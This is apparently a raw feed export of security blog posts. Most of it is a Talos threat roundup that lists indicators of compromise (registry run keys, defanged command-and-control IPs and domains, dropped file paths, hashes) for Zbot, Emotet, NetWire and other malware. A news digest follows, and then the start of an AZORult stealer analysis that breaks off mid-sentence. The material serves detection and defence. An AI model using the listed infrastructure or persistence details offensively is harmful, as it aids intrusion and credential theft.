\n \n\n\n### Win.Malware.Zbot-6896522-0\n\n \n\n\n#### Indicators of Compromise\n\n \n**Registry Keys** \n\n\n * <HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS \n * Value Name: AppInit_DLLs\n**Mutexes** \n\n\n * N/A\n**IP Addresses** contacted by malware. Does not indicate maliciousness \n\n\n * 216[.]218[.]206[.]69\n**Domain Names** contacted by malware. Does not indicate maliciousness \n\n\n * N/A\n**Files and or directories created** \n\n\n * %SystemDrive%\\PROGRA~3\\Mozilla\\thfirxd.exe\n * %System32%\\Tasks\\aybbmte\n * %SystemDrive%\\PROGRA~3\\Mozilla\\lygbwac.dll\n**File Hashes** \n\n\n * 00ffecb86e72d9357a6bbd15b6354fc9213033f748d9b51b597fcc365a9e1f7d\n * 010d598fc0465864690982eec5f30ef48c713916ef4e45a8d8d49420342df428\n * 018edfb60377a0c076e1297bb407cd42b16ffb2c08d4d2aa32b860b061ca5ed3\n * 01bce31e9de13c804a18643616bc34f64bd1c5b25bf8a10f422e2ad19fb7730c\n * 02701dff6c0a0f71b66c9cf69bd895129e810a1a13bcb18be9a8388ff7821b89\n * 02b10171ce53f9592cb441792f91f1d2a7ea1af92e8a814e3bbc42b647afff2c\n * 02c63a651be113f6b1816a357a97af54141e2bd6d9ce4aa2827a629031b8eaf7\n * 02e7cf905bba1542c36e54c120d57c583f6bf33fc15a4fea4e8a41187801b041\n * 0491fc85d831a1f252b61ad87941db7174c53c1b849bc3fa67604251bdbc7fe0\n * 060b3e97fe90a1c725a41fb0ffd3a01ff7b34c74f1460b68dcf05b668dd5521c\n * 06b7d5b411bc5c2b50aa6a257b0799dfa4e098a249602c39a3a43160539087e3\n * 06dea51ea8ec0bbe9578024339ef207c8cac340ca608b519c22999e109514b47\n * 082549d3ad41312e5014c2ada5b99d6dfabc29f09b19ef4d1d9a7ec1297e8356\n * 08807c13e43fd5d202c97c68e25c6178445a65cb0c8f957ff3dc17a293b11020\n * 08d6916f9a64fc2e725d578d1c11c1f77894edc35373d7d308e039bc85e889a7\n * 0997d72a90fbb50cc4fd395c6d9b5bc38f622f5bd66befc055fad32c19ae686e\n * 0a5e7372e854b6ab82834abfaef00be3a1713ae3c921f3d693112482b8d91dff\n * 0aa62de7c50e0d0498ff66687e0ed5ce905f7fe5014b765586ca64c283c2b595\n * 0bca5fd01e55d40ca9d324e0011f56de76cab17d399f6655019f85cbe16ae060\n * 0c3fea106ea5b2d0f943580279e0ddc729e210716ba82344a619ab901438511e\n * 0d08edbe5a8d68b1a6c29fd0956514036a94638e6443db85c37c8e532d15a2c4\n * 0d9c6fe9e4172a80ad9c912eebeecf2baa094012552267ad70d49d6f583add8f\n * 0e9189428c742936b52149e2579844257ab381570b9c13d440fb3304b7cfd935\n * 0ee3a3afec6551c3cdc20836f7d3ae8ac1b20cd7dfa6a14e379ca975d9b342b5\n * 0f18e6faa5e6bc9e81e5cb5c51a7cbd03589eedae7565d1b270fdb803c78c437\n \n\n\n#### Coverage\n\n[](<https://4.bp.blogspot.com/-1hMhIqEn4Es/Wz-6jETR80I/AAAAAAAAAc8/E5qJe2ICdUc2dhS89EAzcTks1OiNvkVhgCLcBGAs/s320/no-umbrella-cloudlock.png>)\n\n \n\n\n#### Screenshots of Detection\n\n**AMP** \n** \n** \n\n\n[](<https://3.bp.blogspot.com/-VLrVWNasYl0/XJUfzSYqr9I/AAAAAAAABno/zzx_nq3GXdEeGNPKja9yJ5RAryXrJzdxQCLcBGAs/s1600/0997d72a90fbb50cc4fd395c6d9b5bc38f622f5bd66befc055fad32c19ae686e_amp.png>)\n\n** \n** \n**ThreatGrid** \n \n\n\n[](<https://4.bp.blogspot.com/-taSgL3_75_o/XJUf3yhh7aI/AAAAAAAABnw/H_G0Aozgt8gTs4Tc4AXmqfme_7vhJZcawCLcBGAs/s1600/0997d72a90fbb50cc4fd395c6d9b5bc38f622f5bd66befc055fad32c19ae686e_tg.png>)\n\n \n \n\n\n### Win.Malware.Ursnif-6896385-0\n\n \n\n\n#### Indicators of Compromise\n\n \n**Registry Keys** \n\n\n * N/A\n**Mutexes** \n\n\n * N/A\n**IP Addresses** contacted by malware. Does not indicate maliciousness \n\n\n * 91[.]134[.]203[.]113\n**Domain Names** contacted by malware. Does not indicate maliciousness \n\n\n * kkariannekatrina[.]company\n * f61leeii[.]com\n * qmitchelkp[.]com\n**Files and or directories created** \n\n\n * %LocalAppData%\\Temp\\~DFDEB0FC636A1346E9.TMP\n * %LocalAppData%\\Temp\\~DFCE77235CFE7E5202.TMP\n * %LocalAppData%\\Temp\\~DFD0DDA0AA1947567A.TMP\n * %SystemDrive%\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp\\~DFA0E5.tmp\n * %SystemDrive%\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp\\~DFBF00.tmp\n * %SystemDrive%\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp\\~DFD9FC.tmp\n**File Hashes** \n\n\n * 002c189b365fecdd1a985d49bb4fb006c15efc47b1000defbdd6f4af1c11a19a\n * 02a860f30efb515b8c290d7eec3aaacc31e13db934b950c12c46c2b418f44c6f\n * 0698973ada3bb251a5d7d24af6532bfe757f26e21c5ccb4683ea90fa22000d31\n * 0bf3ad196d5c033b96508b82a4627371b410a4171a112fe87749ffa35148e700\n * 4e8a9df93d31b02390be3f76e8092bb8dd1296da7b583f0ef7d1e0a4b621f5c9\n * 50e11389b6a65a77dd2806b0101c00c3ecab05c885904d8ed93fd7d5a22caa29\n * 65365868838db8f45660946e8cf4e48420fef2f191087adff2c8525e1e9b92ab\n * 68ac70dcad46e80bb89338cc239d9c7942a4d7baeb39c783cf7f3f41338afee6\n * 72ea94949e5a93a9470f528c2e19fee632f1c35e6592e7466d230fcd4425adca\n * 8b07ef958d6f3f94cb45580d4aaa99202870f35e6c309d94894c5601c861cfff\n * 8ee22466de53f493c666b1f805bfad58f4b9d33b657e266dd65724efb96002e7\n * 9124364a4c9db508a438403d4742db5ba39542753f2a67e4b1f77854962ca1d2\n * ae0f77690e47a8662efaa1507002e3924c2d0986e6c1cd39d3d775e53ad982d2\n * af421716811ae86cf1b9cb4c1615ae152515f3dcbe3bef603737d663839bf520\n * b6ed38788fd409ada58fb0446d839eed07783e79b829e75ef031d67a53a3b62b\n * b90a9ca23c1b2667d8a8a8e14bd3ccec4f928734e91dc28af26e69dafb991668\n * f5bad2d671dc5b30fdbc93304e2d9b194033cc307099eae1d58cee17a2cb717a\n \n\n\n#### Coverage\n\n[](<https://1.bp.blogspot.com/-9t2Of3KWq7I/Wz-6a6Dy3kI/AAAAAAAAAbk/5J2B6tJuFS44Fz9CyF7x9wPcTvmCLrV1gCLcBGAs/s320/all-selected-except-cloudlock.png>)\n\n \n\n\n#### Screenshots of Detection\n\n**AMP** \n \n\n\n[](<https://2.bp.blogspot.com/-PXbZQMwj7A4/XJUgJopzEyI/AAAAAAAABn8/WwVLL7ioz_ow-HIxIq65R-kPx1gnuVrUwCLcBGAs/s1600/b6ed38788fd409ada58fb0446d839eed07783e79b829e75ef031d67a53a3b62b_amp.png>)\n\n \n \n**ThreatGrid** \n \n\n\n[](<https://1.bp.blogspot.com/-NhySywBtn4E/XJUgOMU04cI/AAAAAAAABoA/FLmPO8kG1ngMzurPo0DHsMB7TSCjcinJACLcBGAs/s1600/b6ed38788fd409ada58fb0446d839eed07783e79b829e75ef031d67a53a3b62b_tg.png>)\n\n \n \n**Umbrella** \n \n\n\n[](<https://1.bp.blogspot.com/-jFrwXCc35bA/XJUgSjCLlhI/AAAAAAAABoE/rhUoxFLEzDsrQxuTCBqXLp97KYXo5YUpACLcBGAs/s1600/b6ed38788fd409ada58fb0446d839eed07783e79b829e75ef031d67a53a3b62b_umbrella.png>)\n\n \n \n\n\n### Win.Packed.Kovter-6895460-0\n\n \n\n\n#### Indicators of Compromise\n\n \n**Registry Keys** \n\n\n * <HKCU>\\SOFTWARE\\FC6A75BE78 \n * Value Name: b97dea2a\n * <HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER\\RUN \n * Value Name: 99297e9b\n * <HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \n * Value Name: cafa44a6\n * <HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \n * Value Name: b612d32f\n**Mutexes** \n\n\n * C59C87A31F74FB56\n * 1315B41013857E19\n**IP Addresses** contacted by malware. Does not indicate maliciousness \n\n\n * 97[.]12[.]118[.]34\n * 95[.]173[.]120[.]56\n * 90[.]243[.]251[.]205\n * 96[.]18[.]11[.]140\n**Domain Names** contacted by malware. Does not indicate maliciousness \n\n\n * N/A\n**Files and or directories created** \n\n\n * %LocalAppData%\\recol\\PqIpWoU.asARM\n * %LocalAppData%\\Temp\\ay35fayo.2m3.ps1\n * %LocalAppData%\\Temp\\uipfcjr2.khy.psm1\n**File Hashes** \n\n\n * 352bc4694ee225e59f50875fbfbe2502a0223daa22b94eafed6e997e71588433\n * ae9789ced159c8fe284e49c8352a66070b8a52bc256847be11ad0890da6b1a99\n * b93e29b1ed93143a85a7d6cff2cd87b5c12e8923bea9f50923dbae429c950f2f\n * dbebf2bbd28c1bf5b327a09fef96cba4078ce033b52488ce936dd53e92302437\n * dffa4d8bbde6b5efbc79a4a05df2e4528f5dc991783e81844685bdf1c175b716\n * e1161786aaf5ce7cf3938e1a105a150f3e7e6c4ab44e1b6dc26004b07dbcc6cc\n * e4d4dfa171983e794cf68492fcfd6bb7312b953d22ae03df64213a5dd6496ee3\n * e79f05d135d2c8524a190bd7d22d20674a21c149cc379299011390b932e056af\n * f7c9f1a37f688b54b3494696c2ac6898fb6945038f4306737299750bec901b20\n * fa6adb0b0a129ada90e2dcef5dcd34c2cae28496689630e7f0415882f12e608a\n \n\n\n#### Coverage\n\n[](<https://4.bp.blogspot.com/-1hMhIqEn4Es/Wz-6jETR80I/AAAAAAAAAc8/E5qJe2ICdUc2dhS89EAzcTks1OiNvkVhgCLcBGAs/s320/no-umbrella-cloudlock.png>)\n\n \n\n\n#### Screenshots of Detection\n\n**AMP** \n** \n** \n\n\n[](<https://4.bp.blogspot.com/-p933O4i62F4/XJUgoPTHKYI/AAAAAAAABoQ/UhKAginkxvI1h0rVzf8unZP5wX547Xm1gCLcBGAs/s1600/f7c9f1a37f688b54b3494696c2ac6898fb6945038f4306737299750bec901b20_amp.png>)\n\n** \n** \n**ThreatGrid** \n \n \n\n\n[](<https://4.bp.blogspot.com/-qX15yz0H0NI/XJUgrpdcIsI/AAAAAAAABoU/Yr6-bvVqqkI5hreG-palFVRMcKOUtwr5QCLcBGAs/s1600/f7c9f1a37f688b54b3494696c2ac6898fb6945038f4306737299750bec901b20_tg.png>)\n\n \n\n\n### Win.Malware.Upatre-6894504-0\n\n \n\n\n#### Indicators of Compromise\n\n \n**Registry Keys** \n\n\n * <HKCU>\\SOFTWARE\\FC6A75BE78 \n * Value Name: 0521341d\n * <HKLM>\\SOFTWARE\\WOW6432NODE\\6C5692EEDA48CF842254 \n * Value Name: 4DE9F1CC8F5AEB40A9\n**Mutexes** \n\n\n * N/A\n**IP Addresses** contacted by malware. Does not indicate maliciousness \n\n\n * 139[.]59[.]81[.]114\n**Domain Names** contacted by malware. Does not indicate maliciousness \n\n\n * ncaappraisers[.]com\n**Files and or directories created** \n\n\n * %LocalAppData%\\Temp\\opera_autoupdater.exe\n * %LocalAppData%\\Temp\\wadly.exe\n**File Hashes** \n\n\n * 15e6ce12614b3b296ddd76343b5703d87beb736b162128aedca6499e40ccdfed\n * 1ad3cf284008b50456bdfd4b8b6bdb0558e5667c34d1406bd7f879b33e8cf6f5\n * 24ebabc590cff41db4261eea662c91d3e3d48bc7da2be03009fddac26861117b\n * 3ea2036f27be61f73ef313f78a094c767164becbcbbfc9c4c7a33f3160d9f2bf\n * 498d367976283785672c2c695e29ad7b20a2b0157dc1dc13acef67426da96e58\n * 4c9b775952a0b574d258a982b0fe3bfca25f450b7e4ddc76a20981432135afa3\n * 5d9721eff25abcb7d7a4af4af2d0dd568b181375186ef20a024cb9408a1b3975\n * 68c841e9b1e4d2b2cb65177913d0a7152decd5ecc15f9d424897f2b277ef75c8\n * 7f26231615eab934cf6cf7d54c9ded34b04fc068fd9ee274b4037843ca22c69d\n * 80e7912b1921cfb610b2b43d5ca74c3aa5c6c3edce4aac9bb554b58dc9ddd6e9\n * 81c52a86cae959eac3382cb9b72a8afb47db16746b9e9c3b9254dc0353174530\n * 886515171b4b044976140bcfe2036796c80320072f54ad60078203d7523aad1c\n * 8a53bf2d3220ef740147699a1a801cc58e4b48052b9c5569f3659ba1a26e3a6f\n * 8b241d4a533f3f6ac4819a22e7c1dd7f18556e1f6f835584973902e63ababb66\n * 945055c780e4f5855616bab1b2b94807ae603c6b2c8cedfb0dd5f32a4c07a784\n * a3438650289b8b3025f6d08414af69cafc016080868a0a30d48239716eea2420\n * a95e1d9364069d02e6f844461cd9e7525f1c3f7a07960486403fee266f0fe8c1\n * abb26593cd2fa77ee16fb0640465ec21592cda8d370c13a2fb74836e065b8f69\n * c036fcf79a071d900b32100d015fc16bff5d82044139b6098eebc98009d2b056\n * ca0bbd8f09581c6c0920c782a06d66e5cad25ce672f22e4ca0dde4ea98b905a6\n * e45189ab53b35195f4676bc9081a605dc28cc79e26047763ccf2661d82120221\n * ed75f96c614623b6c1aaa793cd8239c86049635d75406339ec778e7ba23eb317\n * f9ccc2fe7e013cc9ee47eecc3dde93f6bae4aadc00a421254ed6fe35370b6984\n * fcc0294acfcd7e2231d83841cb31e88363f75efab063c79c4a193f2c0cc26460\n \n\n\n#### Coverage\n\n[](<https://1.bp.blogspot.com/-9t2Of3KWq7I/Wz-6a6Dy3kI/AAAAAAAAAbk/5J2B6tJuFS44Fz9CyF7x9wPcTvmCLrV1gCLcBGAs/s320/all-selected-except-cloudlock.png>)\n\n \n\n\n#### Screenshots of Detection\n\n**AMP** \n \n\n\n[](<https://4.bp.blogspot.com/-GRvrhrbCU-4/XJUg86k3KfI/AAAAAAAABog/mScnbKnTt4clAHnZUTzBf4p80CLl4HbbwCLcBGAs/s1600/1ad3cf284008b50456bdfd4b8b6bdb0558e5667c34d1406bd7f879b33e8cf6f5_amp.png>)\n\n \n \n**ThreatGrid** \n** \n** \n\n\n[](<https://4.bp.blogspot.com/-6GCl_G62dCQ/XJUhATgQQCI/AAAAAAAABok/2LiZBaFtmQwUfG5bC2oP5CNLGiDgdWoQACLcBGAs/s1600/1ad3cf284008b50456bdfd4b8b6bdb0558e5667c34d1406bd7f879b33e8cf6f5_tg.png>)\n\n \n \n**Umbrella** \n \n\n\n[](<https://2.bp.blogspot.com/-hdEG5rgZ8DQ/XJUhJsUnFQI/AAAAAAAABoo/FtNBiFw8MP8fLIke9B-joFFrl4_-ApFzQCLcBGAs/s1600/886515171b4b044976140bcfe2036796c80320072f54ad60078203d7523aad1c_umbrella.png>)\n\n \n \n\n\n### Doc.Downloader.Emotet-6894115-0\n\n \n\n\n#### Indicators of Compromise\n\n \n**Registry Keys** \n\n\n * N/A\n**Mutexes** \n\n\n * Global\\I98B68E3C\n * Global\\M98B68E3C\n**IP Addresses** contacted by malware. Does not indicate maliciousness \n\n\n * 181[.]197[.]2[.]252\n * 94[.]73[.]147[.]237\n**Domain Names** contacted by malware. Does not indicate maliciousness \n\n\n * emseenerji[.]com\n**Files and or directories created** \n\n\n * %UserProfile%\\208.exe\n * %WinDir%\\SysWOW64\\SCwdrA.exe\n * %LocalAppData%\\Temp\\CVR478.tmp\n * %LocalAppData%\\Temp\\iidzocqo.viy.psm1\n * %LocalAppData%\\Temp\\oflithzz.nz2.ps1\n**File Hashes** \n\n\n * 2ed65e9a1e796862f97eeebdf46152caf4f7f4204b801287bafe5b11e948ee1b\n * 4c9295e6906108f3dc926a9591a148e4e2636a893d4d2505b35a0d030635462a\n * 563991d43d484069890ca97745c1d7267c918afc260d31a52ec5bfc899a30c94\n * 848b0b2455cb049ec8dfa798592de326b67abe036ae7a637c8aa3ab9e91f5cb7\n * a06d630f62bc13cb49c794bf934a4a3dbe8cf63f352304e71c056199a065958f\n * a42af575f713389ca1b0cd0156dceb753c1728cfe7c0e7a6036c53aef2d2d3fc\n * b9f83bd5eebbdabf1cc5ff8587ca2f12a91f4905538e65587b35bd8bf1132e9c\n * bf0ee1f25309aea8e27968f5d927fe8d05a66437cb86102d367305e61ec9f5d6\n * c60eb3d68445ab0471aceef71bf75182d9d2f92e3ef3ab4fb148d8852dd2c5d0\n * c9bdfb2d6ac9e493bc391b2f64b48d8d5cde10645ea921951b23112e6d73545c\n * d818fd24d2ee5426ca535b7c966021cafbe7bcbb68b9d6ce420b9006859f2df0\n * f3d7d9b36113ffc6aa4388f4d2f3f52349a3ba0984f9adc696b1a6d9db4108e0\n * f832543e87f24eaa23f85c8976b79d7e49d1b4899f5358ba54a71b7c5f803e2d\n \n\n\n#### Coverage\n\n[](<https://1.bp.blogspot.com/-9t2Of3KWq7I/Wz-6a6Dy3kI/AAAAAAAAAbk/5J2B6tJuFS44Fz9CyF7x9wPcTvmCLrV1gCLcBGAs/s320/all-selected-except-cloudlock.png>)\n\n \n\n\n#### Screenshots of Detection\n\n**AMP** \n** \n** \n\n\n[](<https://2.bp.blogspot.com/-w6uZG8mIvz0/XJUhYBjnvXI/AAAAAAAABo0/6lzAPQhEwzEEQ85vBkJDToGKV8Ew0DdsgCLcBGAs/s1600/f3d7d9b36113ffc6aa4388f4d2f3f52349a3ba0984f9adc696b1a6d9db4108e0_amp.png>)\n\n** \n** \n**ThreatGrid** \n \n\n\n[](<https://2.bp.blogspot.com/-Ptqf5UXo_pQ/XJUhb4N9V4I/AAAAAAAABo8/qOezGUmgK_MXGy3kbagqJnn7zf4Cs830QCLcBGAs/s1600/f3d7d9b36113ffc6aa4388f4d2f3f52349a3ba0984f9adc696b1a6d9db4108e0_tg.png>)\n\n \n \n**Umbrella** \n \n\n\n[](<https://3.bp.blogspot.com/-1D8c_jgDuos/XJUhgvrCfpI/AAAAAAAABpA/-VCwyC-4CGYnsxmGuaM0JWzLh8hhzHTUQCLcBGAs/s1600/f3d7d9b36113ffc6aa4388f4d2f3f52349a3ba0984f9adc696b1a6d9db4108e0_umbrella.png>)\n\n \n \n**Malware** \n** \n** \n\n\n[](<https://2.bp.blogspot.com/-08zW77tJdT4/XJUhkljyafI/AAAAAAAABpE/eyy6qp0kjPYC4ddP_2lzVsGhZ2XXPRLNACLcBGAs/s1600/f3d7d9b36113ffc6aa4388f4d2f3f52349a3ba0984f9adc696b1a6d9db4108e0_malware.png>)\n\n** \n** \n\n\n### Win.Trojan.NetWire-6893426-1\n\n \n\n\n#### Indicators of Compromise\n\n \n**Registry Keys** \n\n\n * <HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \n * Value Name: internat.exe\n**Mutexes** \n\n\n * AlIgmljN\n**IP Addresses** contacted by malware. Does not indicate maliciousness \n\n\n * 194[.]5[.]99[.]194\n**Domain Names** contacted by malware. Does not indicate maliciousness \n\n\n * N/A\n**Files and or directories created** \n\n\n * %AppData%\\Install\\Host.exe\n * %UserProfile%\\nltest\\print.exe\n**File Hashes** \n\n\n * 1388ba005085c7a25e2680d0f7ee1d81c49924f3b555b4b6dbec68dddbf9b0e3\n * 189525aa17b231ea223cd3c09443662341f908afc3973d88753ef78570b408ba\n * 1cc74120569cff7c550b730223d0aed91a334c66f4dc2aa751e723e7c2ac2a14\n * 1d9c379630d8d65bed03e26b9564651f0c16ae675ddcbf56ba607a107de27221\n * 24f0f08e4774c2f4d1411ea8b57fcae3b37266830601f6ec30899126d93881f6\n * 26917f6538fa6e8796c3c18c5f018370f6491adc63f4f466365d0c0186e9dd41\n * 286a254ceeb034dc7417e5b9fab7141472a1db6500900f951775b07cd07f22c6\n * 44cf94db97f1af9478f75e1df1afe36931fd741e1717601cc2e3d1d228c8b6c7\n * 47571de1a9a22ae99d0cc5ac1d788a238dc1bdd416d32db63ffde7041bc98d1a\n * 4eea828a9f2ff26440954da153a19d9667592a2c47206b7b5e161751794e3307\n * 50b2adbbbba3fb086169174cd9c64a4f536c455231ae3dc93fb1ed6a71e48cad\n * 530a89d43c4bd1ce99fd7dea8fa148158508653bd56063288da3e1086f274fe9\n * 609676ce7da214d0340436956d1c4733a019811a6ffed5a74e5fa680ccfcdb0b\n * 624b38be3943d4580a7bfe3d22a82dc451e9d5b4e8367886dda182e477e926d3\n * 62b5df538e8e6a1737a0125202ca3a0d99610c08a839bb181cd6abaa9e768ceb\n * 633c5f260bd8794b962c85de11f8eed31bb1bd14b5a11b9de564d6a06796ee7e\n * 7220e58e3625c5d26b7be8450b1d8db9e10cdc4cca9173f372f2e7935fae18c3\n * 7e366ff68193007a80f04d0cf6b33841dfc1a46b815992f241a51120cabab9ba\n * 82a165f62e5c7727289e037c1dc4061aeb894403227a27b7366104ecd5cd08a9\n * 8602358388e40b49cecbbc9e04e9863e95c7b24be53c053098b65553e252d74a\n * 8f1ec1fa3db18ab4d7f716d55f67efb65e126742e7a0b3e276822d516bf53182\n * 9b4f90c1ec5a35213b196fb4e0444f86a5ab394d0111a696ab197fbb5006cdb9\n * a0aeb2aa7b2b833ff153bb372a6e3feadf04cf45035e49168331f26d9c887ec1\n * a2327077fa20fc6c10e72031cb249a874531b376ad335bf5367f6a13566db109\n * a513a5d7c1fcabdd53896d054eac221dcba70f4636b8d3c2f306f121ada943bf\n \n\n\n#### Coverage\n\n[](<https://4.bp.blogspot.com/-1hMhIqEn4Es/Wz-6jETR80I/AAAAAAAAAc8/E5qJe2ICdUc2dhS89EAzcTks1OiNvkVhgCLcBGAs/s320/no-umbrella-cloudlock.png>)\n\n \n\n\n#### Screenshots of Detection\n\n**AMP** \n** \n**\n\n[](<https://4.bp.blogspot.com/-Bnyf2NTRKY4/XJUh2gxi1YI/AAAAAAAABpU/71Iu3mH51pcC-GvXQfoXOa_XCBVkxDSXQCLcBGAs/s1600/530a89d43c4bd1ce99fd7dea8fa148158508653bd56063288da3e1086f274fe9_amp.png>)\n\n** \n** \n**ThreatGrid** \n \n\n\n[](<https://2.bp.blogspot.com/-FGatjL9FLt8/XJUh6iV5DHI/AAAAAAAABpY/CTRneB5GZLAtLF9kPIexkI0BV93GGDAWQCLcBGAs/s1600/530a89d43c4bd1ce99fd7dea8fa148158508653bd56063288da3e1086f274fe9_tg.png>)\n\n \n \n", "modified": "2019-03-22T18:27:17", "published": "2019-03-22T11:27:00", "id": "TALOSBLOG:5AB11C8F4A3BC1A95107A2826F02AD2F", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/BnRXUtodlbE/threat-roundup-0315-0322.html", "type": "talosblog", "title": "Threat Roundup for March 15 to March 22", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-03-22T15:14:34", "bulletinFamily": "blog", "description": "_ \n_[](<http://3.bp.blogspot.com/-gD2Q6VKLgzE/XJTh3v9mi8I/AAAAAAAAFog/AfpYZNsvcmkJpkxiqI0UOjMaklALa6OVwCK4BGAYYCw/s1600/CSWR_banner.jpg>)_Welcome to this week's Cyber Security Week in Review, where Cisco Talos runs down all of the news we think you need to know in the security world. For more news delivered to your inbox every week, sign up for our Threat Source newsletter [here](<https://engage2demand.cisco.com/SubscribeTalosThreatSource>)._ \n \n\n\n### Top headlines this week\n\n \n\n\n * **Norwegian aluminum company Norsk Hydro was hit with a [\u201csevere\u201d ransomware attack](<https://www.bloomberg.com/news/articles/2019-03-19/norsk-hydro-ransomware-attack-is-severe-but-all-too-common>).** The malware affected production operations in the U.S. and Europe. The company says they do not know the origin of the attack and are still working to contain the effects. \n * **Cisco disclosed [several vulnerabilities](<https://threatpost.com/cisco-patches-high-severity-flaws-in-ip-phones/143016/>) in some of its IP phones.** The bugs could allow an attacker to carry out a cross-site request forgery attack or write arbitrary files to the filesystem. Cisco\u2019s IP Phone 8800 series, a desk phone for businesses that includes HD video features, and the 7800 series, which are mainly used in conference rooms at businesses. Snort rules [49509 - 49511](<https://snort.org/advisories/talos-rules-2019-03-21>) protects users from these vulnerabilities. \n * **A new variant of the [Mirai botnet](<https://www.techradar.com/news/mirai-botnet-returns-to-target-iot-devices>) is in the wild targeting televisions hosting signage and presentation systems. **The malware uses 27 different exploits to infect systems, 11 that are completely new to Mirai. Snort rules [49512 - 49520](<https://snort.org/advisories/talos-rules-2019-03-21>) protects users from this new variant. \n \n\n\n### From Talos\n\n \n\n\n * **The new [LockerGoga malware](<https://blog.talosintelligence.com/2019/03/lockergoga.html>) straddles the line between a wiper and ransomware. **Earlier versions of LockerGoga leverage an encryption process to remove the victim's ability to access files and other data that may be stored on infected systems. A ransom note is then presented to the victim that demands the victim pay the attacker in Bitcoin in exchange for keys that may be used to decrypt the data that LockerGoga has impacted.\n * **The [latest episode](<https://blog.talosintelligence.com/2019/03/beers-with-talos-ep-49-pos-malware-rsa.html>) of the Beers with Talos podcast covers point-of-sale malware. **Additionally, the guys recap the RSA Conference from earlier this month and talk OpSec fails. \n * **We recently discovered [11 vulnerabilities](<https://blog.talosintelligence.com/2019/03/vuln-spotlight-cujo.html>) in the CUJO Smart Firewall. **These vulnerabilities could allow an attacker to bypass the safe browsing function and completely take control of the device, either by executing arbitrary code in the context of the root account or by uploading and executing unsigned kernels on affected systems. Snort rules [47234](<https://snort.org/advisories/582>), [47663](<https://snort.org/advisories/596>), [47809, 47811, 47842,](<https://snort.org/advisories/602>) [48261](<https://snort.org/advisories/648>) and [48262](<https://snort.org/advisories/648>) provide coverage for these bugs.\n * **Our researchers discovered a new way to [unmask IPv6 addresses](<https://blog.talosintelligence.com/2019/03/ipv6-unmasking-via-upnp.html>) using UPnP. **This allows us to enumerate a particular subset of active IPv6 hosts which can then be scanned. We performed comparative scans of discovered hosts on both IPv4 and IPv6 and presented the results and analysis.\n \n\n\n### The rest of the news\n\n \n\n\n * **A health care vendor in Singapore [mistakenly exposed the personal information](<https://www.infosecurity-magazine.com/news/vendor-exposes-singapore-health-1-1/>) of 800,000 blood donors. **The vendor reportedly used an unsecured database on an internet-facing server without properly protecting it from authorized access. All affected donors have been notified by Singapore\u2019s government. \n * **Talos Take:** \"The data leak in Singapore is the latest in a string of these. Last summer (June/July) it was 1.5 million records, earlier this year it was 14,000 HIV patients and now this 800,000 blood donor info that you have,\" Nigel Houghton, director of Talos operations.\n * **Google patched [a bug in its Photos app](<https://www.securityweek.com/google-photos-flaw-allowed-hackers-track-users>) that could have allowed an attacker to track users.** The vulnerability opened mobile devices to browser-based timing attacks that could produce information about when, where and with whom a user had taken a photo. \n * **The European Union [hit Google with another fine](<https://www.cnn.com/2019/03/20/tech/google-eu-antitrust/index.html>), this time worth roughly $1.7 billion.** A recent report from the European Commission found that Google \u201cshielded itself from competitive pressure\u201d by blocking rivals from placing advertisements on third-party websites by adding certain clauses in AdSense contracts.\n * **Windows is [ending support for Windows 7](<https://www.theverge.com/2019/3/21/18275675/microsoft-windows-7-notification-support-end-image>).** The company says it will cease support for the operating system on Jan. 14, 2020. Users are being notified of the change via a recent update. \n * **U.S. officials at the recent RSA Conference [warned that China](<https://www.forbes.com/sites/maciejduraj/2019/03/19/u-s-officials-at-recent-rsa-conference-highlights-china-as-biggest-cybersecurity-threat/#523071076fb9>) is the greatest cyber threat to America, not Russia.** Rob Joyce, a cybersecurity adviser at the National Security Agency, compared Russia to a hurricane that can move quickly, while China is closer to the long-term problems that can come with climate change.\n \n\n\n \n\n\n", "modified": "2019-03-22T13:37:29", "published": "2019-03-22T06:37:00", "id": "TALOSBLOG:42F535DD5596638593976CBEF71A57F5", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/ocunMqYylk8/cyber-security-week-in-review-march-22.html", "type": "talosblog", "title": "Cyber Security Week in Review (March 22)", "cvss": {"score": 0.0, "vector": "NONE"}}], "securelist": [{"lastseen": "2019-03-22T13:39:34", "bulletinFamily": "blog", "description": "\n\nThe AZORult Trojan is one of the most commonly bought and sold stealers in Russian forums. Despite the relatively high price tag ($100), buyers like AZORult for its broad functionality (for example, the use of .bit domains as C&C servers to ensure owner anonymity and to make it difficult to block the C&C server), as well as its high performance. Many comment leavers recommend it.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/03/22110346/190319-azorult-analysis-history-1.png>)\n\nBut at the back end of 2018, the main seller, known under the handle CrydBrox, stopped selling the malware:\n\n_\"All software has a shelf life. It's run out for AZORult._ \n_It is with joy and sadness that I announce that sales are closed forever.\"_\n\nSome attribute the move to AZORult 3.2 having become too widely available, likewise the source code of the botnet control panel. This version of the malware spread to other forums where even users without special skills can download and configure it for their own purposes. So the imminent demise of AZORult was apparently down to a lack of regular updates and its overly wide distribution. Yet the story of AZORult does not end there.\n\n## In a nutshell\n\nAZORult is a Trojan stealer that collects various data on infected computers and sends it to the C&C server, including browser history, login credentials, [cookies](<https://encyclopedia.kaspersky.com/glossary/cookie/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>), files from folders as specified by the C&C server (for example, all TXT files from the Desktop folder), cryptowallet files, etc.; the malware can also be used as a loader to [download other malware](<https://securelist.com/what-are-botnets-downloading/87658/>). Kaspersky Lab products detect the stealer as Trojan-PSW.Win32.Azorult. Our statistics show that since the start of 2019, users in Russia and India are the most targeted.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/03/22110355/190319-azorult-analysis-history-2.png>)\n\n \n_Geography of users attacked by Trojan-PSW.Win32.Azorult, 01.01.2019 \u2014 03.18.2019_\n\n## From Delphi to C++\n\nIn early March 2019, 